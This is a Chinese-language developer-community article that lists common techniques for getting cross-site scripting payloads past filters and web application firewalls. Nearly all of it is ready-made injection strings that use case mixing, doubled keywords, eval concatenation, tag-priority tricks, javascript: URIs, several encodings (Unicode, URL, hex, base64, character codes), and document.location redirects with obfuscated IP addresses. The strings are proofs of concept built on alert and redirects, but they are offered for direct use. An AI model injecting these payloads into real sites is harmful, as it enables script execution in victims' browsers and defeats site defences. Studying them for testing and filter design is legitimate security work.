AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

常见XSS绕过技巧

2024-08-01 174
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 常见XSS绕过技巧

空格绕过

当空格被过滤掉时,我们可以用 / 来代替空格

<img/src="x"/onerror=alert(1);>

引号过滤

如果是HTML标签中,我们可以不用引号。如果在JS中,我们可以用反引号代替单双引号

<img src=x onerror=alert(`xss`);>

括号绕过

当括号被过滤掉的时候我们可以使用throw来绕过

<img src=x onerror="javascript:window.onerror=alert;throw 1">

大小写绕过

<ImG sRc=x onerRor=alert("xss");>

双写绕过

有些waf可能只会替换一次且是替换为空,这种情况下我们可以考虑双写关键字绕过

<imimgg srsrcc=x onerror=alert("xss");>

字符拼接绕过

利用eval

<img src="x" onerror="a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)">

利用top

<script>top["al"+"ert"](`xss`);</script>

其它字符混淆

有的waf可能是用正则表达式去检测是否有xss攻击,如果我们能fuzz出正则的规则,则我们就可以使用其它字符去混淆我们注入的代码了

可利用注释、标签的优先级等
<<script>alert("xss");//<</script>
<title><img src=</title>><img src=x onerror="alert(`xss`);"> //因为title标签的优先级比img的高,所以会先闭合title,从而导致前面的img标签无效
<SCRIPT>var a="\\";alert("xss");//";</SCRIPT>

JavaScript伪协议

使用o_n和<scr_ipt>过滤时

"><a href=javascript:alert(/xss/)>

编码绕过

Unicode编码绕过

<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;&#59;">
javasc&#x72;&#x69;pt:alert(/xss/)     (编码了r和i)
<img src="x" onerror="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')">

url编码绕过

<img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">
  
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

Ascii码绕过

<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">

hex绕过

<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>

base64绕过

<img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))">
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

URL绕过

使用URL编码

<img src="x" onerror=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`>

javasc&#x72;&#x69;pt:alert('xsshttp://')

使用IP

1.十进制IP
<img src="x" onerror=document.location=`http://2130706433/`>

2.八进制IP
<img src="x" onerror=document.location=`http://0177.0.0.01/`>

3.hex
<img src="x" onerror=document.location=`http://0x7f.0x0.0x0.0x1/`>
  
4.html标签中用//可以代替http://
<img src="x" onerror=document.location=`//www.baidu.com`>

5.使用\\
但是要注意在windows下\本身就有特殊用途,是一个path 的写法,所以\\在Windows下是file协议,在linux下才会是当前域的协议

6.使用中文逗号代替英文逗号
如果你在你在域名中输入中文句号浏览器会自动转化成英文的逗号
<img src="x" onerror="document.location=`http://www。baidu。com`">//会自动跳转到百度

DIV绕过

利用DIV标签的STYLE属性中的表达式实现XSS攻击:

<DIV STYLE="width: expression(alert('XSS'));">

文章标签:
JavaScript
前端开发
Shadow_143
目录
相关文章
sumith
|
6月前
|
存储 安全 JavaScript
26、XSS漏洞介绍
26、XSS漏洞介绍
sumith
56 0
GG2020gg
|
2月前
|
存储 安全 JavaScript
【XSS】XSS漏洞详细指南
【XSS】XSS漏洞详细指南
GG2020gg
84 3
游客qsxez56gggwqy
|
1月前
|
Web App开发 安全 关系型数据库
xss漏洞原理(五)BeEF
xss漏洞原理(五)BeEF
游客qsxez56gggwqy
85 6
游客qsxez56gggwqy
|
1月前
|
安全
xss漏洞原理(五)BeEF
xss漏洞原理(五)BeEF
游客qsxez56gggwqy
35 3
WCGhost-Netsafe
|
4月前
|
存储 安全 JavaScript
如何处理跨站脚本(XSS)漏洞?
XSS攻击是网页安全漏洞,攻击者插入恶意脚本让用户执行。分为三类:存储型(代码存服务器,用户访问触发)、反射型(需诱使用户点击,常见于搜索结果)和DOM型(通过URL参数影响DOM)。防御措施包括:输入验证、输出编码、使用CSP限制脚本执行、HttpOnly Cookie保护敏感信息及自动化工具检测修复漏洞。这些措施能有效降低XSS风险。
WCGhost-Netsafe
175 0
游客grsdcyoknhiw4
|
安全 JavaScript 前端开发
xss漏洞
xss
游客grsdcyoknhiw4
100 0
ckcsec
|
存储 JavaScript 安全
通用漏洞之XSS跨站
通用漏洞之XSS跨站
ckcsec
410 0
阿里云社区
|
存储 安全 网络安全
XSS 跨站脚本攻击_4 | 学习笔记
快速学习 XSS 跨站脚本攻击_4
阿里云社区
234 0
XSS 跨站脚本攻击_4 | 学习笔记
阿里云社区
|
SQL 存储 安全
XSS 跨站脚本攻击_1 学习笔记
快速学习 XSS 跨站脚本攻击_1
阿里云社区
159 0
XSS 跨站脚本攻击_1 学习笔记
@北鲲
|
存储 Web App开发 JavaScript
xss攻击、绕过最全总结
简述 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至是普通的HTML。攻击成功后,攻击者可能得到更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
@北鲲
2044 0